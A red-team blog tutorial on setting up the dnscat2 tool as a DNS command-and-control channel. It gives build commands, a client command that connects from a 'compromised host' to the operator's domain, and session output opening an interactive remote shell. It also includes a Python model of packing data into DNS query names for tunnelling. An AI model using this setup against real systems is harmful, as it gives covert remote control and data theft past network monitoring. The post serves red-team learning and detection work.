DNS C2 Part 2: Using dnscat2 On Your New C2 Server

For the second part in this series, we will go over the installation, execution, and use of dnscat2 as a communication channel. Again, nothing groundbreaking here. The main thrust of this is to document some of the setup hiccups I went through while playing with this so that I don’t have to relearn it next time. I will touch a little on some of the how/why as I walk through the steps though. In the third post, I plan to do a deeper dive into what this traffic looks like and how the channel works.

Comms Over DNS

Why DNS? Clearly, it's not the most robust way to send data. If you walk through this exercise you'll see it is about as slow as you would expect, since a DNS name is limited to 255 bytes (and each label to 63), so only a small chunk of data fits in each query. Two things make up for that. First, your protocol of choice may be blocked or monitored outbound, while DNS is much less likely to face such restrictions. Second, many organizations with less mature info-sec departments may simply not be looking at DNS traffic for signs of compromise; reviewing DNS logs might not be at the top of anyone's to-do list.
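To make that capacity limit concrete, here is an added example (my code, not part of the original post and not dnscat2's own implementation) that models how a DNS tunnel client packs payload bytes into a query name and how much fits per query. It assumes hex encoding into subdomain labels, which is dnscat2's default encoding, uses the not-evil.network domain that shows up later in this post's window listing, and models the client-to-server direction only (responses carry data in record data and have a different budget).

```python
"""Added example, not dnscat2's own code: model how a DNS tunnel packs
payload bytes into a query name, and what the 63-byte label / 255-byte
name limits do to per-query capacity.

Assumptions (mine, not taken from the post):
  - payload is hex-encoded into subdomain labels (dnscat2's default encoding);
  - the tunnel domain is not-evil.network, the one shown in the window list;
  - the question section is a TXT query (qtype 16), one of the types dnscat2 uses.
"""
import struct

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # 255 octets on the wire (length bytes + root) = 253 text chars


def hex_labels(payload: bytes) -> list:
    """Hex-encode payload and cut it into labels of at most MAX_LABEL chars."""
    h = payload.hex()
    return [h[i:i + MAX_LABEL] for i in range(0, len(h), MAX_LABEL)]


def name_length(payload_len: int, domain: str) -> int:
    """Text length of the query name carrying payload_len raw bytes under domain."""
    chars = 2 * payload_len                     # hex doubles the size
    labels = max(1, -(-chars // MAX_LABEL))     # ceil division, at least one label
    return chars + (labels - 1) + 1 + len(domain)  # dots between labels + dot before domain


def fits(payload_len: int, domain: str) -> bool:
    """True if payload_len raw bytes can ride in a single query name."""
    return name_length(payload_len, domain) <= MAX_NAME


def max_payload_per_query(domain: str) -> int:
    """Largest raw byte count that fits in one query name under domain."""
    n = 0
    while fits(n + 1, domain):
        n += 1
    return n


def encode_query_name(payload: bytes, domain: str) -> str:
    """Client side: build the name that carries this payload chunk."""
    if not fits(len(payload), domain):
        raise ValueError("payload does not fit in one DNS name")
    return ".".join(hex_labels(payload) + [domain])


def decode_query_name(name: str, domain: str) -> bytes:
    """Server side: strip the tunnel domain and recover the payload bytes."""
    suffix = "." + domain
    if not name.endswith(suffix):
        raise ValueError("name is not under the tunnel domain")
    return bytes.fromhex(name[:-len(suffix)].replace(".", ""))


def build_query(name: str, qtype: int = 16, txid: int = 0x1234) -> bytes:
    """Wire-format DNS query: 12-byte header + one question, no EDNS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, QDCOUNT=1
    qname = b"".join(bytes([len(lab)]) + lab.encode() for lab in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)         # QCLASS IN


def parse_query_name(packet: bytes) -> str:
    """Read QNAME back out of a query (assumes no compression pointers)."""
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels)


if __name__ == "__main__":
    domain = "not-evil.network"
    cap = max_payload_per_query(domain)
    print(f"{cap} raw bytes per query under {domain}")
    print(f"a 1 MiB file needs at least {-(-(1 << 20) // cap)} queries")
    name = encode_query_name(b"hello dnscat", domain)
    print(name)
    print(parse_query_name(build_query(name)) == name)
```

Under a 16-character domain the ceiling works out to 116 raw bytes per query before any protocol headers, which is why a few megabytes over this channel takes tens of thousands of round trips. A longer tunnel domain eats directly into that budget, so short domains are not just convenient, they are faster.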

Because people like @mattifestation are constantly touting the benefits of thinking like a blue teamer, I will also write up some thoughts on detection in the next post.

Setting up and running dnscat2

From the Server

Start on your C2 server. I'll assume you are on a distro that has APT available, since Ubuntu is pretty common across VPS providers.

apt-get install ruby-dev gcc make
gem install bundler
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server/
bundle install

Now just test it out with ruby ./dnscat2.rb and you are ready to roll. Note that the server binds UDP port 53, so it has to run as root (or with CAP_NET_BIND_SERVICE); if it dies immediately with a permission error, that is why.

From the Client

Now jump over to your client. This will represent our compromised host in this instance. Our client here is an Ubuntu machine:

apt-get install gcc make
git clone https://github.com/iagox86/dnscat2
cd dnscat2/client/
make

You should now have the binary in the client folder ready to run.

There are several fun options for other OS targets. If your target is Windows, load up dnscat2/client/win32/dnscat2.vcproj in Visual Studio and build it. There is also a PowerShell version of the client at https://github.com/lukebaggett/dnscat2-powershell.

Running dnscat2

Back at the server

In reality, you might want to start your terminal multiplexer of choice (tmux, screen, etc.) so the server survives your SSH session dropping, but for this test I think we are safe just firing it up. Pick a real pre-shared secret: dnscat2 encrypts sessions even without one, but only the secret authenticates the two ends, so without it anyone who can answer your queries can sit in the middle.

sudo ruby ./dnscat2.rb [the-domain-you-setup-from-the-last-post.com] --secret horse_battery_staple

Over to the client/compromised host

./dnscat [the-domain-you-setup-from-the-last-post.com] --secret horse_battery_staple

Back to the c2 server

Once we have a successful connection we will see:

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>

Now we can list active sessions with the window command:

dnscat2> window
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*]
 1 :: command (homebase) [encrypted and verified] [*]

Then interact with a session with the -i flag:

dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (homebase) 1>

Now you can have all kinds of fun up to and including an interactive shell. If you issue the shell command you should see:

New window created: 2
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

Now just press ctrl-z to get back to the main window. Then type window:

dnscat2> window
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*]
 1 :: command (homebase) [encrypted and verified]
 2 :: sh (homebase) [encrypted and verified] [*]       

We see our new window listed as number 2. We just interact with it with the -i flag:

dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (homebase) 2> ls
sh (homebase) 2> controller
dnscat
dnscat.c
dnscat.o
drivers
libs
Makefile
tcpcat.c
tunnel_drivers
win32

There you go. Hack the planet and whatnot!!

Conclusion

Again, nothing even remotely groundbreaking here. Just a step-by-step on setting it up. I'm really looking forward to the next post, where I will break down the how of the communication channel and do some packet dissection for illustration. Please let me know if you think I missed anything critical, would like to see more of something, or have other constructive advice. @capt_red_beardz


2018-07-18 12:34 -0700